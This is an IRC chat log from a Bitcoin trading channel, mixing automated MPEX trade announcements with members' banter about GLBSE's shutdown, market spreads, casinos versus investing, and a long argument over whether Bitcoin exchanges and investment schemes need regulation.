11 02:54:46 xD Oct 11 02:54:51 haha Oct 11 03:00:58 huh, he left w/o giving a receiving addy Oct 11 03:01:15 lol Oct 11 03:01:24 ;D Oct 11 03:04:10 wait a tic, mutum sigilum is an EVE ONLINE corp? Oct 11 03:04:32 with a description of "FOR THE LULZ" Oct 11 03:04:43 http://evewho.com/corp/Mutum+Sigillum+LLC Oct 11 03:08:46 you know what this means? Oct 11 03:09:03 bitcoin is a MMORPG, just like mircea_popescu said Oct 11 03:09:37 :) Oct 11 03:11:13 [MPEX] [S.MPOE] 10427 @ 0.00031413 = 3.2754 BTC [+] Oct 11 03:11:14 [MPEX] [S.MPOE] 11152 @ 0.00031421 = 3.5041 BTC [+] Oct 11 03:11:15 [MPEX] [S.MPOE] 10842 @ 0.00031433 = 3.408 BTC [+] Oct 11 03:37:35 i need a favor. can someone send 6.25 btc to an addy for me, I'll repay you tomorrow Oct 11 03:37:47 addy? Oct 11 03:38:00 [MPEX] [S.MPOE] 10423 @ 0.00031167 = 3.2485 BTC [-] Oct 11 03:38:01 [MPEX] [S.MPOE] 7677 @ 0.00031075 = 2.3856 BTC [-] Oct 11 03:38:08 13bVm9NuHhYASYyXcbYHLqmfQeZ2XSaD7u Oct 11 03:38:30 sent Oct 11 03:38:42 my client went silly, and I think i need to reload the chain to fix it Oct 11 03:38:49 that'll take a while Oct 11 03:38:57 Thank you kakobrekla :) Oct 11 03:39:03 yw Oct 11 04:04:14 [MPEX] [S.MPOE] 5223 @ 0.00031075 = 1.623 BTC [-] Oct 11 04:04:14 [MPEX] [S.MPOE] 9800 @ 0.00031048 = 3.0427 BTC [-] Oct 11 04:04:16 [MPEX] [S.MPOE] 25777 @ 0.00031028 = 7.9981 BTC [-] Oct 11 04:05:31 pirate pays out tomorrow, smickles pays out tomorrow.... coincidence? Oct 11 04:06:27 kakobrekla gets paid tomorrow! Oct 11 04:06:32 occams razor, kekeke Oct 11 04:29:27 [MPEX] [S.MPOE] 21023 @ 0.00031028 = 6.523 BTC [-] Oct 11 04:29:28 [MPEX] [S.MPOE] 36677 @ 0.0003101 = 11.3735 BTC [-] Oct 11 04:32:57 ;;eauth thestringpuller Oct 11 04:32:58 Request successful for user thestringpuller, hostmask thestringpuller!~leflor@99-39-98-185.lightspeed.tukrga.sbcglobal.net. Get your encrypted OTP from http://bitcoin-otc.com/otps/0FF2943DA179E169 Oct 11 04:33:51 ;;gpg everify freenode:#bitcoin-otc:cca7968273a95c153fb1b5cd24c5fb449204644a24fbfcaa0a2f90cc Oct 11 04:33:52 You are now authenticated for user thestringpuller with key 0FF2943DA179E169 Oct 11 04:34:49 ;;getrating thestringpuller Oct 11 04:34:49 This user has not yet been rated. Currently authenticated from hostmask thestringpuller!~leflor@99-39-98-185.lightspeed.tukrga.sbcglobal.net . Oct 11 04:43:14 soo what's new Oct 11 04:43:57 how much of your day do you spend on irc mp (that's my nickname for you mircea_popescu) Oct 11 04:44:37 you're not the only one calling me mp lol. and as long as the computer's on i have irc going. Oct 11 04:44:43 i don't spend that much on it personally. Oct 11 04:45:22 do you code? Oct 11 04:45:34 not really./ Oct 11 04:46:21 I used the campus labs to make a test FPGA Oct 11 04:46:27 since everyone is doing it Oct 11 04:46:30 :P Oct 11 04:46:31 and ? Oct 11 04:46:43 It's tough I just started writing the verilog based on a paper I read Oct 11 04:46:49 mircea_popescu: wrong question Oct 11 04:46:57 It's not what's new, but what's left Oct 11 04:46:58 gonna take months with my professor helping to get a single "chip" Oct 11 04:47:16 rdponticelli so what is left ? Oct 11 04:47:23 thestringpuller still, good practice for you i'd say. Oct 11 04:47:45 Nothing Oct 11 04:47:57 Uses a lot less power. Oct 11 04:48:17 what's left is not glbse lol Oct 11 04:48:29 I made a good deal of money on the market crash :P Oct 11 04:48:51 how exactly ? Oct 11 04:49:40 The second glbse went under I sold a bunch of bitcoins, then waited and bought them back at a cheaper price... Oct 11 04:49:42 https://bitcointalk.org/index.php?topic=117715.msg1263447#msg1263447 cyeck this out tho Oct 11 04:51:59 lol poor glbse Oct 11 04:52:54 You've probably been asked this many times before mp, but how does GLBSE being shutdown make you feel? Oct 11 04:53:31 thestringpuller well, tbh, relieved. it was the main threat to having a btc finacials market. the longer it dragged on the worse it was. Oct 11 04:53:44 course, sucks for all the people who wouldn't listen / knew better / whatever. Oct 11 04:54:54 [MPEX] [S.MPOE] 29400 @ 0.00031091 = 9.1408 BTC [+] Oct 11 04:54:55 [MPEX] [S.MPOE] 34425 @ 0.00031207 = 10.743 BTC [+] Oct 11 04:56:08 Hey... GLBSE was the best trading platform (not for investing, for making trades) Oct 11 04:56:26 I was getting almost pirate rates without the pirate stocks. Oct 11 04:56:40 That's just how wild prices were Oct 11 04:56:43 that's cause people don't know how to trade. Oct 11 04:56:51 quite Oct 11 04:57:00 Made thousands Oct 11 04:57:06 Probably why Satoshi dice is listed on mpex Oct 11 04:57:08 BTC-Mining that'd be part of the problem, really. Oct 11 04:57:28 My wallet didn't find it to be a problem at all. Oct 11 04:57:45 only gigamining had a solid trade trend Oct 11 04:57:58 it wasn't volatile Oct 11 04:58:07 so, have glbse asse holders heard anything yet? Oct 11 04:58:08 yeah. if you go to the casino and make a lot of money your wallet might not complain Oct 11 04:58:15 but that doesn't make casinoing an economic activity. Oct 11 04:58:18 asset, i mean Oct 11 04:58:36 tell that to the kids from MIT who counted cards Oct 11 04:58:47 right. from a macro perspective the thing was harmful. Oct 11 04:59:01 otherwise, im sure plenty of people made money bilking the idiots who thought they're investors. Oct 11 04:59:38 him trading helps decrease the spread (somewhat), making the market more stable Oct 11 04:59:40 I lost 20 btc, but I've been mining with free electricity, so it's a drop Oct 11 05:00:04 It's not casinoing if the asset has a base value through profit sharing. The wild price fluctuations just make it much easier to buy below market value and resell it far above market value. Oct 11 05:00:14 for something that didn't have a lot of market depth, GLBSE had a sizable volume of outstanding shares. Oct 11 05:00:46 Yes, quite Oct 11 05:01:03 Most shares sold and weren't trading much afterward Oct 11 05:01:06 BTC-Mining isn't that how market makers make their money, via the bid-ask spread? Oct 11 05:01:27 I suppose Oct 11 05:02:01 and on some assets the spread was 50% Oct 11 05:02:14 or more Oct 11 05:02:16 when the bid-ask spread is 10% - 80% and the trading fee is 0.5% but only for the one selling/buying into orders... Oct 11 05:02:24 actually, take mpoe.etf. a DAY before it being unwound (at like 1.2x) Oct 11 05:02:30 the bid was .3 the ask 1.5 or so. Oct 11 05:02:48 right Oct 11 05:02:48 one of the precious few solvent assets there. Oct 11 05:02:59 so not for a second do i consider that "market" in any way related to any economics. Oct 11 05:03:02 it was pure randomness. Oct 11 05:03:24 but you could make money off the randomness Oct 11 05:03:29 had nothing to do with btc finance, or finance at all. Oct 11 05:03:38 the continuing pretense that it did however, was very harmful for everyone. Oct 11 05:03:46 no dispute you can make mone yat the casino Oct 11 05:03:51 like nefario said, it was meant to be a toy Oct 11 05:03:54 LOL Oct 11 05:03:55 thinking going to the casino = participating in the economy is damaging. Oct 11 05:03:59 Nefario is a dick. Oct 11 05:04:07 Who is now scared of going to jail. Oct 11 05:04:17 I feel we get the last laugh somehow. Oct 11 05:04:31 Even though the joke is on the issuers... Oct 11 05:04:45 I wish he would move faster so we could just be done with the whole thing Oct 11 05:05:44 bitcoinbear bitcoinica first, Oct 11 05:05:46 then glbse. Oct 11 05:06:00 mircea, that's exactly the point, it's not casino odds if a mining asset pays for x each week but the randomness makes it go 50% under the market rate per mhash then a few days later 50% over market rate. Oct 11 05:06:08 Don't casinos make a lot of money mircea_popescu? Like Las Vegas for instance, the Bellagio just rakes in money. Oct 11 05:06:17 Wouldn't running a casino contribute to the economy? Oct 11 05:06:22 thestringpuller actually these days casinos are doing very poorly. Oct 11 05:06:32 o rly? Oct 11 05:06:32 anybody want to buy 10 BDK.BND shares at the low price of 0.08? Oct 11 05:06:35 yeah. Oct 11 05:06:35 tough times Oct 11 05:06:41 but isn't satoshi dice doing well? Oct 11 05:06:46 that's "casinoing" Oct 11 05:06:51 bad 3 or so years. if it keeps up you'll see bankruptcies Oct 11 05:06:57 I'd buy them for 0.0001 BTC each... Oct 11 05:07:01 thestringpuller playing satoshidice isn't investing tho. Oct 11 05:07:08 buying their shares is entirely a diff game. Oct 11 05:07:59 I see what you are saying. Oct 11 05:08:00 lol Oct 11 05:08:28 I'll outbid BTC-Mining: 0.00011 Oct 11 05:08:47 I don't know if you've ever seen the Chappelle Show, but there was an episode where this guy came into a lot of money, played a dice game, and won, so he had tons of money. Oct 11 05:08:54 :D Oct 11 05:09:04 0.00011001 here! Oct 11 05:09:13 Damn, feels like good old GLBSE Oct 11 05:09:19 lmao Oct 11 05:10:04 Like if you won the lottery, then put it all on double 0 at the casino and won again. But then again I guess it's all "casinoing" Oct 11 05:10:12 We can do it here! Lets go! Oct 11 05:10:15 yeah Oct 11 05:12:00 How will coinlab compete against the asic rush? Oct 11 05:12:11 btc-mining, was it you who was always outbidding me by a single satoshi? drove me nuts Oct 11 05:12:38 thestringpuller why'd they compete ? Oct 11 05:13:03 I kept outbidding by one satoshi and people kept outbidding me by one satoshi, I was going nuts making people go nuts. Oct 11 05:13:23 with those 2 second page loads... Oct 11 05:13:33 maybe you folks just need some better masturbation material. Oct 11 05:13:40 I refused to bid out more than 4 significant digits Oct 11 05:14:33 page loads, 2 sec if you were lucky. it made me feel like I was back in 1993 or something Oct 11 05:15:08 a well. as long as it was working for ya lol Oct 11 05:15:38 It was due to GLBSE being quite spread up Oct 11 05:15:57 < dub> pirate pays out tomorrow, smickles pays out tomorrow.... coincidence? <<< lolwut? Oct 11 05:18:37 also, most of my stuff isn't here yet, i'm using a stepstool with a couple of rags for padding as my seat Oct 11 05:19:56 haha suffer. Oct 11 05:20:44 and this is where my accounting company will start Oct 11 05:20:45 [MPEX] [S.MPOE] 2251 @ 0.00031207 = 0.7025 BTC [+] Oct 11 05:20:56 from rags to riches :D Oct 11 05:21:28 haha gl! Oct 11 05:21:42 Where are you ipoing, smickles? Oct 11 05:21:49 :) Oct 11 05:22:04 heh, not a public company ;) Oct 11 05:22:16 :( Oct 11 05:22:42 That's not fun Oct 11 05:22:52 i sold some btc earlier to pay licensing and registration fees Oct 11 05:22:59 You're supposed to raise a ton of money and run away Oct 11 05:23:15 You're doing it all wrong Oct 11 05:23:19 rdponticelli: if i need to raise funds, you'll be the first one i make an offer to, m'kay? Oct 11 05:23:31 <[\\\]> aww Oct 11 05:23:33 <[\\\]> I'm hurt Oct 11 05:23:42 Ok, I'm happy now Oct 11 05:24:25 <[\\\]> ;;ticker Oct 11 05:24:25 Best bid: 12.00104, Best ask: 12.05, Bid-ask spread: 0.04896, Last trade: 12.05, 24 hour volume: 27195, 24 hour low: 11.8029, 24 hour high: 12.19 Oct 11 05:24:28 <[\\\]> we're at 12 Oct 11 05:24:29 <[\\\]> woo Oct 11 05:24:37 <[\\\]> c'mon $2.00 btc Oct 11 05:24:37 o hey. Oct 11 05:24:56 [\\\]: did you miss us at sub-11 earlier? Oct 11 05:25:23 <[\\\]> no Oct 11 05:25:44 <[\\\]> but if it drops to $2, I'm gonna buy 50k btc Oct 11 05:28:58 <[\\\]> That's what the AMEX is for Oct 11 05:29:26 smickles: doesnt work anymore Oct 11 05:29:52 banks maliciously reverse loans within a week after they credit check you a second time Oct 11 05:30:17 <[\\\]> thats why you wait 3 weeks Oct 11 05:30:18 they claim "to prevent fraud", but the only fraud going on is their actions since they already signed the papers Oct 11 05:30:19 <[\\\]> :-x Oct 11 05:30:42 Ive heard of banks doing it after 3 MONTHS Oct 11 05:31:18 smickles it was 10.7 or so Oct 11 05:31:57 Diablo-D3 prolly a pretty penny to be made from sueing then Oct 11 05:32:37 mircea_popescu: sometimes Oct 11 05:32:43 sometimes you have judges going along with it Oct 11 05:32:52 not sure if they're just inept or they're in the bank's pocket Oct 11 05:39:05 Chaos - Battle of the Wizards Oct 11 05:39:08 anyone ever played that ? Oct 11 05:44:27 mircea_popescu: is that the one that is similar to wherewolf? Oct 11 05:44:34 YES Oct 11 05:44:35 er, spelling bad Oct 11 05:44:36 I FOUND A GIF Oct 11 05:44:38 THAT DESCRIBES Oct 11 05:44:42 THE NEFARIO DRAMAS Oct 11 05:44:51 us, and I'm clearly kirk: http://i.imgur.com/oafQx.gif Oct 11 05:46:11 [MPEX] [S.MPOE] 1249 @ 0.00031242 = 0.3902 BTC [+] Oct 11 05:46:36 smickles http://www.mykeblack.com/flash/chaos/chaos_content.html Oct 11 05:46:37 http://imgur.com/gallery/JJaLA Oct 11 05:46:40 oh god I want one Oct 11 05:46:43 just so I can make it talk Oct 11 05:47:03 oh fuck comments already go straight to south park Oct 11 05:50:19 http://imgur.com/gallery/M7nOu Oct 11 05:50:26 HUH Oct 11 05:53:36 oh my connection is so slow Oct 11 06:11:19 [MPEX] [S.MPOE] 21473 @ 0.00031079 = 6.6736 BTC [-] Oct 11 06:19:02 Diablo-D3: remake a movie with it Oct 11 06:19:36 oh fuck Oct 11 06:19:40 NO! Oct 11 06:19:43 I MUST BE TAKING OVER WORLD! Oct 11 06:22:08 gak, I want to shoot thos imgur commenters more that I want to shoot everyone on btctalk Oct 11 06:22:25 http://mozillamemes.tumblr.com Oct 11 06:23:04 http://25.media.tumblr.com/tumblr_mabnf0OQNA1rrf1eeo1_500.jpg gigavps? Oct 11 06:23:27 sometimes I wonder Oct 11 06:36:52 [MPEX] [S.MPOE] 25227 @ 0.00031079 = 7.8403 BTC [-] Oct 11 06:36:54 [MPEX] [S.MPOE] 10373 @ 0.0003101 = 3.2167 BTC [-] Oct 11 06:44:32 so did nefario open things up ? Oct 11 06:45:34 not toomany hours ago Oct 11 06:46:08 still didnt enable password recovery though :/ Oct 11 06:46:20 dont forget your password Oct 11 06:46:52 i havent logged in since my account was emptied from the "hack" in may Oct 11 06:49:33 dont get hacked Oct 11 06:49:43 i somehow dont think I was :P Oct 11 07:02:39 [MPEX] [S.MPOE] 23235 @ 0.0003101 = 7.2052 BTC [-] Oct 11 07:02:41 [MPEX] [S.MPOE] 7832 @ 0.0003101 = 2.4287 BTC [-] Oct 11 07:02:41 [MPEX] [S.MPOE] 1300 @ 0.00031008 = 0.4031 BTC [-] Oct 11 07:02:42 [MPEX] [S.MPOE] 29233 @ 0.00031 = 9.0622 BTC [-] Oct 11 07:07:14 so how do you get your "assets" Oct 11 07:07:21 omg, i'm rocking a 128k connection Oct 11 07:07:28 (bits) Oct 11 07:09:33 lol, for the fun of it, i fired up cgminer and pointed it at my client, Oct 11 07:09:49 smickles: a hotel I stayed in Japan last april, was still on an ISDN modem Oct 11 07:09:57 that was about 12yrs old Oct 11 07:10:16 it said "Accepted c5b1c47c.155918dc" and for a moment, my heart raced as i thought i hit a block Oct 11 07:10:29 Ukto: oh my Oct 11 07:27:45 [MPEX] [S.MPOE] 67796 @ 0.00031017 = 21.0283 BTC [+] Oct 11 07:27:46 [MPEX] [S.MPOE] 8804 @ 0.0003109 = 2.7372 BTC [+] Oct 11 07:53:17 [MPEX] [S.BVPS] 500 @ 0.00320653 = 1.6033 BTC [+] Oct 11 07:53:18 [MPEX] [S.BVPS] 35 @ 0.00316891 = 0.1109 BTC [-] Oct 11 08:11:34 New Version of Moneychanger and ot prompt for windows: https://bitcointalk.org/index.php?topic=77301.80 Please help test and report any issues. Oct 11 08:16:57 ok, so here's some data : Oct 11 08:17:02 From 4/2/2012 to 10/4/2012: Oct 11 08:17:02 187 contract listings Oct 11 08:17:02 66519 total trades Oct 11 08:17:02 6006474 total contract volume Oct 11 08:17:02 35911.75164BTC total volume Oct 11 08:17:09 sauce : https://bitcointalk.org/index.php?topic=117491.msg1260596#msg1260596 Oct 11 08:17:30 so glbse traded 36k btc in 6 months. Oct 11 08:18:31 [MPEX] [S.MPOE] 33400 @ 0.0003109 = 10.3841 BTC [+] Oct 11 08:43:59 [MPEX] [S.MPOE] 7400 @ 0.00031046 = 2.2974 BTC [-] Oct 11 09:09:18 [MPEX] [S.MPOE] 1350 @ 0.0003109 = 0.4197 BTC [+] Oct 11 09:09:37 [MPEX] [S.DICE] 135 @ 0.0032 = 0.432 BTC [-] Oct 11 09:34:42 [MPEX] [S.MPOE] 24397 @ 0.0003109 = 7.585 BTC [+] Oct 11 09:34:44 [MPEX] [S.MPOE] 26203 @ 0.00031282 = 8.1968 BTC [+] Oct 11 09:47:54 [MPEX] [O.BTCUSD.P140T] 2 @ 0.23231876 = 0.4646 BTC [-] Oct 11 09:47:56 [MPEX] [O.BTCUSD.P140T] 1 @ 0.23049622 BTC [-] Oct 11 09:51:21 [MPEX] [B.MPCD.C] 150 @ 0.00076466 = 0.1147 BTC [-] Oct 11 10:06:47 [MPEX] [O.BTCUSD.C120N] 2 @ 0.23654313 = 0.4731 BTC [+] Oct 11 10:31:29 [01:17] 35911.75164BTC total volume Oct 11 10:32:06 Sounds awfully wrong since GIGAMINING alone sold 40k bonds at 1 BTC or more and had like twice that volume. Oct 11 10:33:54 [MPEX] [S.MPOE] 25100 @ 0.00031046 = 7.7925 BTC [-] Oct 11 10:33:55 2823.6BTC total revenue from trading fees Oct 11 10:34:09 x 200 is over 500k trading volume Oct 11 10:34:21 I remember calculating it as higher than that however. Oct 11 10:59:41 [MPEX] [S.MPOE] 5976 @ 0.00031149 = 1.8615 BTC [+] Oct 11 10:59:42 [MPEX] [S.MPOE] 10800 @ 0.00031046 = 3.353 BTC [-] Oct 11 11:25:07 [MPEX] [S.MPOE] 43867 @ 0.00031 = 13.5988 BTC [-] Oct 11 11:25:08 [MPEX] [S.MPOE] 4733 @ 0.00030994 = 1.4669 BTC [-] Oct 11 11:50:08 [MPEX] [S.MPOE] 2600 @ 0.00031034 = 0.8069 BTC [+] Oct 11 12:15:52 [MPEX] [S.MPOE] 37300 @ 0.00031032 = 11.5749 BTC [-] Oct 11 12:15:53 [MPEX] [S.MPOE] 32200 @ 0.00030994 = 9.9801 BTC [-] Oct 11 12:25:10 morning Oct 11 12:26:39 coinbr was updated, check it.. just few kinks to iron and we can do official announcement Oct 11 12:26:53 but referrals are already working Oct 11 12:29:00 jurov: cool :), will check later after work Oct 11 12:36:14 see you later Oct 11 12:41:09 [MPEX] [S.MPOE] 2567 @ 0.00030994 = 0.7956 BTC [-] Oct 11 12:41:10 [MPEX] [S.MPOE] 11633 @ 0.00030992 = 3.6053 BTC [-] Oct 11 13:06:11 [MPEX] [S.MPOE] 10600 @ 0.00031034 = 3.2896 BTC [+] Oct 11 13:31:18 [MPEX] [S.MPOE] 40156 @ 0.00031034 = 12.462 BTC [+] Oct 11 13:57:43 [MPEX] [S.MPOE] 44467 @ 0.00030992 = 13.7812 BTC [-] Oct 11 13:57:45 [MPEX] [S.MPOE] 22054 @ 0.00030983 = 6.833 BTC [-] Oct 11 14:22:54 [MPEX] [S.MPOE] 1268 @ 0.00031034 = 0.3935 BTC [+] Oct 11 14:22:56 [MPEX] [S.MPOE] 35300 @ 0.00031036 = 10.9557 BTC [+] Oct 11 14:25:05 ltc had some epic volume today Oct 11 14:34:04 this chan is dead... Oct 11 14:35:25 just less scammer talk Oct 11 14:36:59 hehe Oct 11 14:37:13 less chick fights Oct 11 14:37:49 lol Oct 11 14:37:54 where is usagi? Oct 11 14:48:07 [MPEX] [S.MPOE] 9100 @ 0.00031079 = 2.8282 BTC [+] Oct 11 14:52:06 is glbse still collecting aml docs? Oct 11 14:54:19 no Oct 11 15:07:42 Chaang-Noi: it proved to be too technically challenging Oct 11 15:07:54 are you kidding? Oct 11 15:08:05 I dunno, all I know is that for a while he had a form up and then he took it down Oct 11 15:08:11 yeah Oct 11 15:08:20 i guess it was not a legal demand after all Oct 11 15:08:31 he's so sketchy :P Oct 11 15:08:31 i wonder what is going on in his head right now... Oct 11 15:08:57 yeah... Oct 11 15:09:14 what a mess Oct 11 15:09:37 also i wonder what the SEC will do now that glbse closed down Oct 11 15:09:46 i wonder if they will still go after them or just walk away Oct 11 15:10:25 "yeah, sure, you were hacking up kidnapped hookers for years before, but you appear to have stopped, so I guess you're good. Sorry for the unpleasant chase!" Oct 11 15:10:28 :P Oct 11 15:10:45 - no legal prosecutor ever Oct 11 15:10:53 but who knows :) Oct 11 15:13:37 [MPEX] [S.MPOE] 39500 @ 0.0003121 = 12.328 BTC [+] Oct 11 15:22:10 well Oct 11 15:22:19 sometimes they act to stop an activity Oct 11 15:22:30 this is not always the case Oct 11 15:22:58 but glbse said they were wrong to be doing what they were doing, it just does not add that headline pop Oct 11 15:23:06 fed shut down already closed exchange... Oct 11 15:23:12 seems like a waste of tax payer money Oct 11 15:23:29 now if glbse was a terrorist operation sure... Oct 11 15:23:42 but trading btc and all that shit? its not going to be an easy case i bet Oct 11 15:23:55 well, the crime was already committed, and they can claim that many people were defrauded as a result of the unregulated exchange operating for so long Oct 11 15:24:05 yes they can Oct 11 15:24:07 due to all the fraudulent unregulated securities issued on it Oct 11 15:24:12 but my question is will tehy Oct 11 15:24:47 really this is a small thing Oct 11 15:25:11 and really the SEc going after this will make the right wing nuts in the usa take a hard look at btc and might even help it Oct 11 15:25:27 if the SEC is scared of BTC im bullish in BTC :) Oct 11 15:27:30 :P Oct 11 15:28:34 "I'm against all forms of regulation and government control, except, OH SHIT, PEOPLE ARE BUYING IMMORAL THINGS WITH BITCOIN. WE MUST BANISH IT FROM THE EARTH AS GOD EXPECTS" Oct 11 15:29:04 or, from the other side, "regulation is good, and we need to protect dumbasses from themselves. We must regulate bitcoin" Oct 11 15:29:49 yay politics :) Oct 11 15:31:08 that's not to say I think one side is as good as the other, mind you Oct 11 15:32:27 :) Oct 11 15:32:34 yeah Oct 11 15:39:49 [MPEX] [S.MPOE] 23500 @ 0.00031183 = 7.328 BTC [-] Oct 11 15:41:53 [MPEX] [S.DICE] 885 @ 0.0032 = 2.832 BTC [-] Oct 11 15:55:44 [MPEX] [O.BTCUSD.P130T] 719 @ 0.20596839 = 148.0913 BTC [+] Oct 11 16:16:52 copumpkin: do you think ppl should be able to run ponzi schemes and scam dumbasses out of hundreds of thousands of bitcoins? Oct 11 16:17:11 what makes you think that? Oct 11 16:17:16 or do you think there should be regulation that protects dumbasses from themselves? Oct 11 16:17:42 BitcoinNannyState Oct 11 16:17:45 nothx Oct 11 16:18:41 running to the cops or the SEC to sue or get someone in trouble for scamming you out of BTC is using that regulation Oct 11 16:19:34 iz: do you think ppl should be able to run ponzi schemes and scam dumbasses out of hundreds of thousands of regular CASH? .. bitcoin is the equivalent of cash ... if you blilndly give it to the rong person ... its gone dude and its yer own fault Oct 11 16:20:13 people should treat bitcoin with the same scrutiny that they do for cash transactions Oct 11 16:20:19 no, people shouldn't be able to do that with cash, and that's why the SEC and regulatory agencies exist Oct 11 16:20:23 it's not the cash vs bitcoin Oct 11 16:20:46 it's regulated exchanges and investment companies, like with cash Oct 11 16:20:48 [MPEX] [S.MPOE] 34100 @ 0.00031101 = 10.6054 BTC [-] Oct 11 16:20:49 [MPEX] [S.MPOE] 26656 @ 0.00031079 = 8.2844 BTC [-] Oct 11 16:20:59 and by "Cash" i mean coins and notes Oct 11 16:21:02 SEC cant track that Oct 11 16:21:05 MrTiggr: are you saying that "real-world" cases of fraud should not be prosecuted? Oct 11 16:21:10 no Oct 11 16:21:13 vs unregulated exchanget and investment companies, like with bitcoin, where most of them are scams Oct 11 16:21:14 because the defrauded party was dumb enough to hand over his money? Oct 11 16:21:21 i am SPECIFICALLY comparing bitcoin to CASH Oct 11 16:21:22 coins/notes Oct 11 16:21:25 that's irrelevant though Oct 11 16:21:30 this is whether someone was defrauded or not Oct 11 16:21:32 no chargeback and not really very tracable Oct 11 16:21:41 do you blame the victim of fraud on the victim? Oct 11 16:21:41 well Oct 11 16:21:48 not irrelevant Oct 11 16:21:49 those are technical aspects Oct 11 16:21:54 implementation details, you might say Oct 11 16:21:58 the next point i will make is Oct 11 16:22:16 we should provide bitcoiners with the tools to ensure that their "cash-like" transactions can be conducted with the best possible confidence Oct 11 16:22:36 it's not about transactions with scams though Oct 11 16:22:38 if my mate buys a TV from a stranger with cash and gets ripped Oct 11 16:22:43 im not gonna cry for him Oct 11 16:22:52 they are making the transactions intentionally Oct 11 16:23:14 the point i am making is that there is a level of responsibility that normal transactions are held to, which bitcoiners seem to think doesnt apply Oct 11 16:23:16 what if your grandma spends all of her retirement money buying a new spaceage TV that cooks dinner for her Oct 11 16:23:26 its sad Oct 11 16:23:30 but it happens Oct 11 16:23:35 in fact, happened to my grandpa Oct 11 16:23:39 i FEEL for him Oct 11 16:23:45 but he was stoopid enuf to do it Oct 11 16:23:46 should it be legal for a company to carry on business defrauding grandmas? Oct 11 16:23:53 not check who he qwas dealing with etc Oct 11 16:24:00 he shud learn his lesson Oct 11 16:24:01 who do you check with? Oct 11 16:24:04 MrTiggr: what if a con artist lies his way into your building and takes money from your vault? Oct 11 16:24:06 if there is no regulatory agency Oct 11 16:24:20 how can you tell what is a real investment company.. and what is a scammy investment company? Oct 11 16:24:23 is this purely about not using violence to obtain someone else's property? Oct 11 16:24:40 you just have to take their word for it Oct 11 16:24:43 it seems you could make arguments about someone not being strong enough to resist robbers Oct 11 16:24:46 or the word on the street Oct 11 16:24:48 and deserving it Oct 11 16:25:08 in fact, I have seen gun advocates say that Oct 11 16:25:09 not as far as i am concerned - i equate bitcoin to cash ... im not giving my dollar bills to anyone i dont trust ... neither should a bitcoiner Oct 11 16:25:20 this has nothing to do with cash Oct 11 16:25:31 cash boils down to whether you can prove that you gave the money to the person Oct 11 16:25:32 MrTiggr: investments don't care how you give them the money Oct 11 16:25:37 that's got little to do with the actual crime Oct 11 16:25:40 neither do scammers Oct 11 16:25:41 in the same breath - i personally do everything i can to help bitcoiners make the best decision about their trades Oct 11 16:25:47 (i AM bitcoin-police after all) Oct 11 16:25:52 whether bitcoin is equivalent to cash is completely irrelevant to the legality/morality of the issue Oct 11 16:26:01 MrTiggr: how do you know what is good and what is a scam? Oct 11 16:26:05 it just determines how easy it is to prove that you gave it to them Oct 11 16:26:07 investments (like glbse .. which is what i imagine you are referring) are not the same thing Oct 11 16:26:23 iz ...i agree - its hard Oct 11 16:26:31 but its hard with "real cash" too Oct 11 16:26:51 yeah, that's like.. we're discussing if children should be able to drink alcohol or not, and you are like "well.. i think it all depends on if it's vodka or whiskey" Oct 11 16:27:01 lets not confuse casual -otc bitcoin trading with .. ponzi or other investment Oct 11 16:27:30 it doesn't matter if it's bitcoin or cash or pokemon cards Oct 11 16:28:07 an investment scam vs a real investment opportunity are hard to tell the difference between, without there being some sort of regulatory agency Oct 11 16:28:10 so... you are defending the people who blindly "invested" bitcoin in .. lets say for arguments sake .. a glbse stok .. with out checking who was managing the funds Oct 11 16:28:15 is that bitcoin's fault Oct 11 16:28:16 no Oct 11 16:28:22 it's not bitcoin's fault Oct 11 16:28:23 nobody's claiming it is bitcoin's fault Oct 11 16:28:34 that was never even a question Oct 11 16:28:38 but it happened because there is no regulatory agency Oct 11 16:28:54 it happened due to lack of consumer diligence imho Oct 11 16:28:55 and the reason that doesn't happen so much in the real USD markets Oct 11 16:29:00 is because of regulation Oct 11 16:29:15 "who is nefario" << first Qn id have asked myself if investing in any glbse stock Oct 11 16:29:18 MrTiggr: just like I got robbed because I hadn't learned martial arts, or wasn't carrying a gun? it happened because an asshole defrauded you. Oct 11 16:30:03 do you think it should be okay for people to dress up like police officers and go around to people's houses Oct 11 16:30:23 and the people who don't call the main police office to check on the badge numbers to make sure they are real cops Oct 11 16:30:24 "you should have called up the police office to make sure they had sent someone, before letting him in" Oct 11 16:30:27 :) Oct 11 16:30:29 regulation i don thtink is the answer... i agree there is aproblem, but im kinda sick of bitcoiners blaming their own lack of due diligence on the "missing regulatory component" for which bitcoin was originally founded Oct 11 16:30:31 deserve the robbing they are going to get Oct 11 16:30:48 you are mistaken Oct 11 16:30:50 I don't think bitcoin was originally founded "for" that Oct 11 16:30:54 bitcoin is a protocol Oct 11 16:30:56 bitcoin wasn't founded for that Oct 11 16:31:03 De-Centralized currency is one of the core tennant of bitcoin Oct 11 16:31:07 the protocol doesn't require regulation, but the people using it might Oct 11 16:31:08 regulation centralizes Oct 11 16:31:09 the problem are the bitcoin exchanges not being regulated Oct 11 16:31:13 no it doesn't Oct 11 16:31:16 this is silly Oct 11 16:31:16 not that bitcoin itself isn't regulated Oct 11 16:31:17 :) Oct 11 16:31:37 the problem are the bitcoin exchanges not being regulated << how so ?? all the major exchanges are subject to AML etc Oct 11 16:31:42 how could you regulate cash against scams involving cash (besides counterfeiting)? Oct 11 16:31:43 seems regulated to me Oct 11 16:31:52 lol Oct 11 16:31:57 bitfloor Oct 11 16:32:06 tradehill Oct 11 16:32:19 they are just some random dude Oct 11 16:32:30 putting a website up on a VPS somewhere that he bought w/ bitcoins Oct 11 16:32:32 ?? and they would have been raepd for not being AML compliant Oct 11 16:33:15 for trading real money Oct 11 16:33:29 only because they trade real money, and use the regulation that real money provides Oct 11 16:33:45 for bitcoin investment companies that DON'T deal in cash and only in bitcoins Oct 11 16:33:54 they don't have any regulations they need to follow at all Oct 11 16:34:04 true Oct 11 16:34:11 all the more reason for due diligence Oct 11 16:34:21 you're saying "no regulation to bitcoin" while touting that bitcoin exchanges are AML compliant.. Oct 11 16:34:28 either you centralize and regulate or you dont Oct 11 16:34:44 and the only reasons bitcoin exchanges are AML compliant is BECAUSE of the regulation of USD Oct 11 16:34:48 exchanges are not bitcoin ... they are a way out/in to bitcoin Oct 11 16:34:56 you don't need to centralize the mint to have regulation of exchanges Oct 11 16:35:31 if you are talking about regulation of exchanges, i have no problem with that Oct 11 16:35:44 all you need is a 3rd party regulatory agency that has a vested intrest in maintaining everyone's trust and not letting ppl break rules just because they got paid off Oct 11 16:35:58 also regulating bitcoin investment companies Oct 11 16:36:07 ooh thats "all you need" .. so who we gonna trust on that Oct 11 16:36:24 